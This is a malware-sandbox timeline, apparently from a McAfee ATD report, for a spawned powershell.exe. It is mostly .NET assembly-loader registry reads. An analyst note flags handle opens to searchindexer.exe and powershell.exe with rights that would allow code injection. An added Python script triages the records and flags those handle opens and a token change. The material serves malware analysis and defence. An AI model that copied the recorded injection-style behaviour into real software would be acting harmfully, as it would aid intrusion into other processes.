00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
Opened

Registry
00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
Opened

00:04:157 Signal global\cordbipcsetupsyncevent_2532


Objects

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch
Files Read
00:04:157
Opened Normal

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch


Files Read
00:04:171
Opened Normal

Signal
00:04:171 global\cordbipcsetupsyncevent_2808
Objects

File
00:04:171 Operations, Obtained path of the folder from its CLSID
miscellaneous

Registry
00:04:171 HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
Opened

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config


Files Read
00:04:171
Opened Normal

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
Opened

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
Created

C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat
Files Read
00:04:188
Opened Normal

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:188
Read mscorlib,2.0.0.0,,b77a5c561934e089,x86

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
00:04:188
Read LatestIndex

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read Status

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read Status

73078014
Thread
00:04:188
Created

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ILDependencies

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
Opened

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:04:188
Read NIUsageMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:04:188
Read ILUsageMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read NIDependencies

00:04:218 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
00:04:235 | Process | Operations, miscellaneous | Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
00:04:235 | Process | Operations, miscellaneous | Queried the activation context
00:04:250 | Process | Operations, miscellaneous | Set the priority value for a thread
00:04:329 | Files Read | Opened Normal | C:\Windows\assembly\pubpol17.dat
00:04:329 | File | Operations, miscellaneous | Retrieved the path of the Windows directory
00:04:329 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:329 | Registry | Read Latest | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:343 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
00:04:343 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437
00:04:343 | Registry | Read LegacyPolicyTimeStamp | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:343 | Registry | Read index17 | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default

00:04:360 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:360 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:375 | Registry | Read Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default

00:04:375 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
00:04:375 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
00:04:375 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
00:04:375 | Registry | Read System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Read System,2.0.0.0,,b77a5c561934e089,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375 | Registry | Read System.Xml,2.0.0.0,,b77a5c561934e089,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:390 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
00:04:390 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
00:04:390 | Registry | Read System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:390 | Registry | Read System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:421 | Registry | Opened | HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
00:04:421 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
00:04:421 | Files Read | Opened Normal | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
00:04:454 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI

00:04:500 | Registry | Read ILDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Read EvalationData | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f
00:04:500 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read MissingDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Read NIDependencies | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read ConfigString | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500 | Registry | Read ConfigMask | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37

00:04:515 | Registry | Read System.Transactions,2.0.0.0,,b77a5c561934e089,x86 | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
00:04:515 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Read System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515 | Registry | Read System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515 | Registry | Read System.Data,2.0.0.0,,b77a5c561934e089,x86 | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515 | Registry | Read LastModTime | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
00:04:515 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
00:04:515 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515 | Registry | Read SIG | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515 | Registry | Read Modules | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515 | Registry | Read DisplayName | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44

00:04:563 | File | Operations, miscellaneous | Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
00:04:610 | Files Read | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
00:04:625 | File | Operations, miscellaneous | Obtained the path of the Windows system directory
00:04:625 | Files Read | Opened Normal | C:\Windows\system32\l_intl.nls
00:04:671 | Process | Opened powershell.exe | VMRead & QueryInformation
00:04:671 | Others | Enabled/disabled privileges in an access token
00:04:688 | Process | Opened searchindexer.exe | Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation
00:04:688 | Process | Opened powershell.exe | Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation
00:04:704 | Process | Operations, miscellaneous | Retrieved system information
00:04:704 | Process | Operations, miscellaneous | Obtained the identifier of the thread or process that created the specified window
00:04:735 | Process | Operations, miscellaneous | Obtained the priority value for a thread

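Analyst note on the 00:04:671 to 00:04:688 entries above. The spawned powershell.exe first opened a handle to powershell.exe with VMRead & QueryInformation, enabled or disabled privileges in an access token, and then opened handles to searchindexer.exe and powershell.exe with a near-complete access mask (Terminate, CreateThread, VMOperation, VMRead, VMWrite, DupHandle, CreateProcess and the rest). That combination of rights is what remote-thread or process-hollowing style injection needs, but this part of the timeline shows only the handle opens, not a memory write or a thread creation, and the report does not say whether the second powershell.exe is the caller itself or another instance spawned by the document. The script below is an added example, not part of the McAfee ATD report or its tooling: it reads timeline records in the one-line form used above, suppresses the .NET Fusion binder noise (NativeImagesIndex, PublisherPolicy and GACChangeNotification reads) that makes up most of this page, and surfaces the handle opens, the token change and the PowerShell runtime load with a severity. The record format, the set of injection-capable rights and the severities are this example's own assumptions; the sample records are constructed from entries in this report.

```python
"""Triage helper for a sandbox timeline (added example, not ATD code).

Reads records in the one-line form "time | type | operation | target",
drops .NET assembly-binder noise and keeps the events worth an analyst's
attention. Record format, rule set and severities are assumptions made
for this example; the sample records are constructed from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Handle rights that let one process write into, or run code in, another.
INJECTION_RIGHTS = {"VMWrite", "VMOperation", "CreateThread", "DupHandle"}

# Registry key prefixes that are pure .NET Fusion binder bookkeeping.
LOADER_NOISE = (
    r"hklm\software\microsoft\fusion\nativeimagesindex",
    r"hklm\software\microsoft\fusion\publisherpolicy",
    r"hklm\software\microsoft\fusion\gacchangenotification",
)

# Targets that show the PowerShell engine being brought up in a process.
POWERSHELL_KEY_PREFIX = r"hklm\software\microsoft\powershell"
POWERSHELL_ENGINE_DLL = "system.management.automation.dll"


@dataclass
class Event:
    time: str
    kind: str
    operation: str
    target: str = ""  # three-field records such as "Others" have no target


@dataclass
class Finding:
    severity: str  # high / medium / low / info
    time: str
    summary: str


def parse_timeline(text: str) -> list[Event]:
    """Split 'time | type | operation [| target]' records; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split(" | ", 3)]
        if len(fields) < 3:
            raise ValueError(f"malformed record: {line!r}")
        events.append(Event(*fields))
    return events


def is_loader_noise(ev: Event) -> bool:
    """Registry traffic under the Fusion binder keys carries no analytic value."""
    return ev.kind == "Registry" and ev.target.lower().startswith(LOADER_NOISE)


def triage(events: list[Event]) -> tuple[list[Finding], int]:
    """Return (findings in timeline order, number of noise records dropped)."""
    findings: list[Finding] = []
    noise = 0
    for ev in events:
        if is_loader_noise(ev):
            noise += 1
            continue
        target = ev.target.lower()
        if ev.kind == "Process" and ev.operation.startswith("Opened "):
            # "Opened <image>" in the operation column, access rights in the target column.
            name = ev.operation[len("Opened "):]
            rights = set(re.findall(r"[A-Za-z]+", ev.target))
            hit = sorted(rights & INJECTION_RIGHTS)
            if hit:
                findings.append(Finding("high", ev.time,
                    f"handle to {name} opened with {', '.join(hit)}: rights sufficient "
                    "for code injection; confirm the target is not the caller itself"))
            else:
                findings.append(Finding("low", ev.time,
                    f"handle to {name} opened with {', '.join(sorted(rights))}"))
        elif "privileges in an access token" in ev.operation:
            findings.append(Finding("medium", ev.time,
                "token privileges changed (AdjustTokenPrivileges); identify the privilege"))
        elif target.startswith(POWERSHELL_KEY_PREFIX) or target.endswith(POWERSHELL_ENGINE_DLL):
            findings.append(Finding("info", ev.time, f"PowerShell runtime artefact: {ev.target}"))
    return findings, noise


# Constructed sample: records copied from this report's timeline for the
# spawned powershell.exe, in the one-line table form used above.
SAMPLE = r"""
00:04:375 | Registry | Read Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL | HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:421 | Files Read | Opened Normal | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
00:04:500 | Registry | Read MVID | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:671 | Process | Opened powershell.exe | VMRead & QueryInformation
00:04:671 | Others | Enabled/disabled privileges in an access token
00:04:688 | Process | Opened searchindexer.exe | Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation
00:04:688 | Process | Opened powershell.exe | Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation & QueryInformation
00:04:782 | Registry | Opened | HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
"""


def main() -> None:
    findings, noise = triage(parse_timeline(SAMPLE))
    for f in findings:
        print(f"[{f.severity:6}] {f.time}  {f.summary}")
    print(f"({noise} loader-noise records suppressed)")


if __name__ == "__main__":
    main()
```

On the sample the two 00:04:688 handle opens come out as high, the token change as medium, the VMRead-only open as low, and the engine DLL read and PowerShellEngine key open as informational context, while the two Fusion binder reads are dropped. The high finding is deliberately worded as a lead rather than a conclusion: a handle with these rights is the precondition for injection, and the timeline has to be read forward from here for the write or thread-creation event that would confirm it.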

00:04:750 | Files Read | Opened Normal | C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
00:04:750 | Files Read | Opened Normal | C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
00:04:782 | Registry | Opened | HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
00:04:782 | Registry | Opened | HKLM\Software\Microsoft\PowerShell
00:04:782 | Registry | Opened | HKLM\Software\Microsoft\PowerShell\1
00:04:782 | Registry | Read ApplicationBase | HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
00:04:796 | Registry | Opened | HKLM\Software\Microsoft\StrongName
00:04:813 | Registry | Opened | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084
00:04:813 | Registry | Opened | HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35

00:04:829 | Registry | Read Status | HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
